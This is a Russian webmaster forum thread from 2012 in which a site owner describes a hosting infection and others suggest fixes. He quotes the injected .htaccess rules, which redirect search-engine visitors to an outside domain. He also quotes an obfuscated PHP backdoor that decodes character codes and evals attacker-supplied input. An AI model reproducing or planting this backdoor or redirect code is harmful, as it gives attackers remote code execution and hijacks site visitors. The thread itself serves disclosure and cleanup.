Форум Сайтостроение Веб-строительство

Вирусы атакуют

U7
На сайте с 29.09.2012
Offline
43
udjen777
614

Хостинг на timeweb. Вирус переписывает через 10 минут файл .htaccess Удалять и исправлять смысла нет В файле появляются такие записи " <IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)

RewriteRule ^(.*)$ http://vibranceversus.ru/Priority?8 [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ http://vibranceversus.ru/Priority?8 [R=301,L]

</IfModule>"

---------- Добавлено 06.10.2012 в 06:43 ----------

Кто столкнется пишите подскажу. Проверить можно просто. Забить свой сайт в google и перейти по ссылке, если вы вместо своего сайта перешли или на гугл или на другой но не на свой Значит вам тоже не повезло (

IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#1
udjen777:
Удалять и исправлять смысла нет

Возможно, временным решением может быть установка прав 444?

Однако, лучше найти, как оно работает. Скорее всего, шелл (можно ай-болитом поискать или ручками). Хотя, не исключено и крон-задание.. и лом хостера ( сомневаюсь)

p.s. сайт на CMS-ке?

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
Редирект на платник Вирус, дописывающий яваскрипт в Автоматически изменяются права доступа
U7
На сайте с 29.09.2012
Offline
43
udjen777
#2
ivan-lev:
Возможно, временным решением может быть установка прав 444?
Однако, лучше найти, как оно работает. Скорее всего, шелл (можно ай-болитом поискать или ручками). Хотя, не исключено и крон-задание.. и лом хостера ( сомневаюсь)
p.s. сайт на CMS-ке?

Да я справился за 10 часов))) А сайты на этом хостинге были в основном на битриксе

---------- Добавлено 06.10.2012 в 07:08 ----------

Да я просто написал вдруг, кому помощь понадобится. А то по этому коду гугл не чего не выдает. Видно мне повезло был один из первых

---------- Добавлено 06.10.2012 в 07:15 ----------

Возможно, временным решением может быть установка прав 444? Если вы имели про права на .htaccess то он его перезаписывает все равно с какими правами И делает так красиво что по фтп Даже даты изменения не увидишь. И самое палевное в том, что этот вирус случайно запалил на 1 из 12 сайтов А другие работали все ок без проблем

---------- Добавлено 06.10.2012 в 07:17 ----------

Это вирус еще прописывает в файлах php такую строчку сверху if(isset($_GET[w7637t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); }

Расшифровать java скрипт нужно расшифровать вот такой 136 доменов
R
На сайте с 24.01.2008
Offline
180
Алексей
#3

ТС если проблемы повторяться я рекомендую вам проверить ваш сайт на все виды вредоносные скрипты + дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S2
На сайте с 04.09.2012
Offline
47
Serg2012
#4

В 99% случаев такие вирусы заливаются через ФТП. Чистите сайт, меняете пароль, проверяете свой комп на наличие троянов.

Конечно посканировать свой сайт на наличие шелов и вредоносных скриптов тоже не мешает.

Виртуалтный хостинг от 1.2$ (http://billing.domen-hosting.net/aff.php?aff=142) VDS/VPS от 8,5$ (http://billing.domen-hosting.net/aff.php?aff=142) Выделенные сервера от 39$l (http://billing.domen-hosting.net/aff.php?aff=142)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий